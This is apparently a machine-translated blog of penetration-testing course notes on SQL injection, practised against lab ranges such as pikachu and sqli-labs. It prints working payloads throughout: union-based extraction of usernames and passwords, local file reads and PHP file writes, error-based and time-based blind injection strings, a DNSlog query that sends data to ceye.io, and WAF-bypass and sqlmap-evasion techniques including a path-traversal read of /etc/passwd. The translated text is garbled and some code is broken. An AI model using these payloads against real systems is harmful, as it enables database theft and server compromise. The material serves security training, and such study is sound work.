Xiaodi penetration & WEB vulnerability (iii-i)

Video resources

SQL injection (11-18)

11. Vulnerability introduction

11.1 PHP method of traversing all files and subfolders under a folder

function my_dir($dir) {
	$files = [];
	if(@$handle = opendir($dir)) {
		while(($file = readdir($handle)) !== false) {
			if($file != ".." && $file != ".") {
				if(is_dir($dir . "/" . $file)) { //If it is a subfolder, recursion is performed
					$files[$file] = my_dir($dir . "/" . $file);
				} else {
					$files[] = $file;
	return $files;

echo "<pre>";
echo "</pre>";

If an error is reported: PHP Parse error: syntax error, unexpected '[' in /usercode/file.php on line 4, just switch to php 5.4 or above


https://github.com/zhuifengshaonianhanlu/pikachu------ shooting range

pikachu shooting range notes
1. Environment construction & violent cracking
2. pikachu shooting range & XSS (II)
3. pikachu shooting range & CSRF & SQL injection (III)
4. pikachu shooting range & rce & File Inclusion & upload and download & ultra vires (IV)
5. pikachu shooting range & directory traversal & Information Disclosure & deserialization & xxE & redirection & SSRF (V)

12. Recognize SQL injection

sql injection is that in data interaction, the front-end data is not strictly judged when it is transmitted to the background, resulting in the transmitted data being spliced into the sql statement and executed as a part of the sql statement, resulting in data leakage, loss and even server paralysis.
If the code is not filtered or the filtering is not rigorous, there will be vulnerabilities.

  • Injection may exist in the following links. Fourth, post submission will also exist.
  • The following 2 and 3 tests are correct. If x has injection, test after X.

12.1 information collection during injection

Judgment injection
and 1=1	normal
and 1=2	error
 There may be injection. In fact, in the final analysis, it depends on whether our input will affect the website, that is, our operation is effective

Supplement: the difference between order by and group by
order by defaults to ascending

  • There is an information in versions above mysql5.0_ Schema database, which records all databases, indicating column names.
  • "." in the database represents subordinate
  • select * information_schema.tables; Record all table names
  • where table_name = '' filter criteria
  • select * from information_schema.columns; Record all column names
  • where column_name = '' filter criteria
  • wherw table_schema = '' filter criteria

information gathering

  • Judge the number of data order by x, judge the number according to the wrong format of the correct field, and then select 1,2,3
  • Query database version()
  • Database name (database)
  • Database user()
  • Operating system @ @ version_compile_os

13. MySQL injection

  • union select 1,group_concat(schema_name),3 from information_schema.schemata explodes all databases
  • union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'pikachu' get specific database table name
  • union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'users' and table_schema = 'pikachu' get specific database specific table column data

    * union select 1,username,password from pikachu.users query user's data
File read / write operation
load_file():Read function
into outfile or iinto dumpfile:derived function
 Common ways to get paths
 Error reporting display, legacy files, vulnerability error reporting, platform configuration files, blasting, etc -2/?id=-1%20union%20select%201,load_ file(%27D:\Software\PhpStudy\phpstudy_ Pro \ \ www \ \ sqli labs master \ \ SQL connections \ \ DB creds. Inc% 27), 3 read local files,%20%27x%27%20,3%20into%20outfile%20%27D:\x.php%27%20 -- + local file write

Reference: Magic_ quotes_ Functions such as GPC (Magic quote switch) and database security

  • magic_quotes_gpc
  • When magic_ quotes_ When GPC = on, characters such as single quotation mark ('), double quotation mark ("), backslash (\) and NULL (NULL character) in the input data will be added with backslash

14. Type of SQL injection: submit injection

In the real SQL injection security test, we must first specify the submitted data and submission method before injection. The submitted data type and submission method can be obtained through packet capture analysis. In the subsequent security test, we must also meet the same operations before injection.

#Briefly specify the parameter type
 Numbers, characters, search, JSON etc.
Numbers can be added directly to sql in
 Characters are accessed through single and double quotation marks sql Statement

#Brief and clear request method|

among SQI Statement interference symbol:  ', ", %, ), } And so on, depending on the writing method
'"]})Can be written as the default test
  • JSON data form

15. Oracle and MongoDB injection of SQL injection

  • The double quotation marks of json in the following figure do not need to be closed. What needs to be closed is the single quotation marks or double quotation marks in the SQL statement.
Briefly learn the injection characteristics of various databases
Access, mysql ,mssql(sql server) mongoDB, postgresql, sqlite,oracle, sybase etc.
Access The database is placed under the website

Database architecture composition, database high authority operation

Briefly learn how to use various injection tools
 Familiar with tool support library, injection mode, advantages and disadvantages, etc
Sqlmap, NoSQLAttack, Pangolin etc.
access structure
		Table name
mysql,mssql etc.
		database A
				Table name
		database B
				. . . 
						. . . 	
								. . . 

15.1 Access injection test

  • sqlmap will give false positives, as shown in the following figure
  • Manual test, because asses does not have a database, you can directly query the data

15.2 Sql Server

  • The database permissions we obtain will affect our next test ideas
  • High authority direct test
  • Get data step by step with low permissions

15.3 sqlmap test

Full parameter explanation of sqlmap

15.4 Oracle Database

Reference: Oracle injection summary

15.5 MongoDB

  • MongoDB is a database based on distributed file storage. Written in C + +. It aims to provide scalable high-performance data storage solutions for WEB applications.
  • MongoDB is a product between relational database and non relational database. It is the most functional and relational database among non relational databases.
  • Data transmission adopts JSON transmission.

NoSQL Attack supports the injection test of this database, which runs under linux

  • The tojson function can output json data

Resources involved

https://github.com/youngyangyang04/NoSQL Attack tools supporting MongoDB in Linux environment, P14

16. WEB vulnerability - query method and error reporting blind note of SQL injection

During SQL injection, many injections have no echo. The reason for the non echo may be the problem of the query method of SQL statements. At this time, we need to use relevant error reporting or blind injection for subsequent operations. At the same time, as manual injection, we can better select the corresponding injection statements by understanding or predicting the approximate writing method of their SQL statements in advance.

select Query data
 Data display and query in website application
 example: select * from news where id=$id

insert insert data
 Carry out user registration and addition in the website application
 example: insert into news (id, url, text) values (2, 'x','$t')

delete Delete data
 Delete articles and users in background management
 example: delete from news where id=$id 

update Update data
 Member or background center data synchronization or caching
 example: update user set pwd='$p' where id=2 and username= 'admin'

order by Sort data
 Generally, data sorting is performed in combination with table name or column name
 example: select * from news order by $id
 example: select id, name, price from news order by $order

Key understanding:
We can use the above query methods to predict the relationship between the website application and the injection point SQL Query mode

pikachu Vulnerability practice platform
SQL Injection error reporting blind injection
 Blind injection means that the acquired data cannot be echoed to the front page during the injection process. At this time, we need to use some methods to judge or try. This process is called blind injection. We can know that blind injection can be divided into the following three categories:

Boolean based SQL Blind injection-Logical judgment
regexp, like, ascii, left, ord, mid

Time based SQL Blind injection-Delay judgment
if, sleep

Error based SQL Blind injection-Error echo
floor, updatexml,extractvalue


reference resources:
like 'ro%'					#Judge whether ro or Ro.. is true
regexp '^xiaodi[a-z]' 		#Match xiaodi and xiaodi... Etc
if(condition,5,0)				#If the condition is true, return 5, otherwise return 0
sleep(5)					#The execution of the sQI statement is delayed for 5 seconds
mid(a,b,c)					#Starting from position b, intercept the c bit of a string
substr(a,b,c)				#Starting from position b, intercept the c length of string a
left(database(),1),database() #left(a,b) intercepts the front B position of a from the left
length(database())=8 		#Judge the length of database () name
ord=ascii ascii(x)=97 		#Judge whether the ASCII I code of x is equal to 97
pikachu insert
username=x' or(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e)))
from information_schema.tableslimit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
or '&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit

username=x' or updatexml(1,concat(0x7e,(version())),0) or

username=x' or extractvalue(1,concat(0x7e,database())) or

pikachu update
sex=%E7%94%B7&phonenum=13878787788&add=hubeNicky' or (select 1 from(select count(*),concat( floor(rand(0)*2),0x7e,(database()),0x7e)x from information_schema.character_sets group by x)a) or '&email=wuhan&submit=submit 

sex=%E7%94%B7&phonenum=13878787788&add=hubeNicky' or updatexml(1,concat(0x7e,(version())),0) or '&email=wuhan&submit=submit

sex=%E7%94%B7&phonenum=13878787788&add=Nicky' or extractvalue(1,concat(0x7e,database())) or '&email=wuhan&submit=submit

pikachu delete



16.1 judgment of injection point

These four locations will receive the values we passed. Normally, they can be used as injection points, as long as they can respond to the test code.

16.2 for Boolean and delay without echo

mysql_fetch_array: no echo function

SQL injection

Delayed blind injection: utilization and Link the correct statement so that if Judge whether the script is right or wrong, combine the two, and then give feedback through time to judge whether the script is executed correctly.
and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+
and if(ascii(substr((select table_name from information_schema.tables where table_schema=database()
limit 0,1),1,1))=101,sleep(3),0)--+
  • If the database is security, it will be delayed for 5 seconds, otherwise it will not be delayed
  • Judge the number of database bits


A ccess offset injection: solve the problem that the column name cannot be obtained
Viewing the form value of the login box source code or observing the URL characteristics can also be aimed at the situation that the table or column cannot be obtained

Resources involved


17. The second SQL injection, encryption and decryption, DNS and other injection

DNSlog:The problem that blind injection can not echo data and low efficiency is solved

17.1 secondary injection

  • The first one is the original one and the second one is registered by us. When we change the password of the second one, due to the existence of '#, the database will make a wrong judgment, which is equivalent to changing the password of the first one.

17.2 DNSlog

  • DNSlog can solve the problem of no echo
  • mysql> select * from users where id=1 and if((select load_file(concat('\\\\',(select version()),'.eii0i8.ceye.io\\abc'))),1,0);Empty set (21.14 sec)

take url Separate from injection statements
echo $payload;
echo $urls;

Resources involved


18. SQL injection stack and WAF bypass injection

  • Stack Injection: a stack of sql statements are executed together, including one of the statements; Indicates the end of the statement, and the multiple statements are connected and executed together.

18.1 application scenarios

Stack Injection

  • The administrator account password is required for injection. The password is encrypted and cannot be decrypted
  • Data is inserted during stack injection. The user password is user-defined and can be decrypted and logged in normally

Special symbols

  • Some symbols do not affect the execution of sql statements, but can bypass waf detection

18.2 demonstration cases

  • Sqlilabs-Less38-stack injection (multiple statements)
  • WAF deployment - safe dog, pagoda and other WAF construction and deployment
  • Briefly explain the rules of protection waf strategies such as safety dog and pagoda
  • Briefly demonstrate the protection rules of safety dog bypass sqlinject
  • Analysis of Bypass principle of measured simple CMS header injection vulnerability

Safety dog interception

  • Some protection strategies of safety dog

  • You can bypass the safety dog

  • You can bypass it by changing the submission method

Used to bypass the safety dog waf
%23==>url code==>#
%0a==>url code==>Line feed
%20==>url code==>Space

A symbol used to split statements

 The security dog detection penetration script adopts overall verification, such as:unint select This whole
 You can use the above method unint/*!*/select Not triggered waf

Parameter pollution

If there are multiple same parameters, the acceptance of parameters will be different for different servers to build websites, thus invalidating the original parameters.

Resources involved:


19. SQL map for SQL injection bypasses WAF

  • In the actual attack and defense, we often need to master some features, such as server, database, application layer, WAF layer, etc., so that we can construct Payload more flexibly, so that we can fight against various WAFS and bypass security defense measures for vulnerability exploitation.

19.1 bypass method - white list

Mode 1:IP White award list
 Obtained from the network layer ip,This kind of forgery can not be used. If it is obtained from the client IP,So there may be forgery IP Bypass the situation.
test method:modify http of header come bypass waf

Mode II:Static resources
 Specific static resource suffix requests, common static files(.js .jpg .swf .css wait),Similar white list mechanism,waf In order to detect efficiency, such static file name suffix requests are not detected. sql.php?id=1
 remarks: Aspx/php Only the front ones are recognized.aspx/.php Basically not recognized later

Mode III:url White list
 In order to prevent false blocking, some waf Built in default white list, such as admin/manager/system And other management background. as long as url If there is a whitelist string in, it will be regarded as a whitelist and will not be detected. common url Construction posture: manage/../sql.asp?id=2
waf adopt/manage/"Compare, as long as uri Exist in/manage/As a white list, we don't detect it, so we can pass/sql.php?a=/manage/&b=../etc/passwd Bypass defense rules.

Mode 4:Crawler white list
 part waf It has the function of providing crawler white list (crawlers of major browsers). There are generally two technologies to identify crawlers:
1,according to useragent 
2,Judge by behavior
UserAgent It can be easy to cheat. We can try to bypass it by pretending to be reptiles. User Agent switcher (Firefox Add ons),Download address:
https : //addons.mozilla.org/en-us/firefox/addon/user-agent-switcher/

%23==>url code==>#
%0a==>url code==>Line feed
%20==>url code==>Space


%20union%20/*!44509select*/%201,2,3    /*!44509select*/: By inserting the version number (4).45.09),Bypass detection mechanism

id=1/**&id=-1%20union%20select%201,2,3%23*/				Special symbols


Sometimes there is no problem with the injection statement, but the injection cannot go in. Maybe WAF detects the injection tool

  • The package sent by sqlmap has its own tool header

  • Judgment method 1: WAF log

  • Judgment method 2: WAF protection rules

  • Judgment method 3: packet capture

  • resolvent:

  • Idea 1: random agent header method based on salmap

  • Idea 2: use the head of search engine

  • Specify Baidu header

SQLMap description

Extension 1: some WAF S detect other fields, which can be bypassed by replacing this field with burp packet capture( Just modify one)
Extension 2: generate a txt file from the injection statement and run it in the sqlmap directory( Can support running multiple)

19.2 injection with tools will be blackened

  • Solution 1: delay injection
  • Solution 2: use agent pool

Keywords: PHP Database SQL

Added by ciaran on Sat, 04 Sep 2021 05:29:15 +0300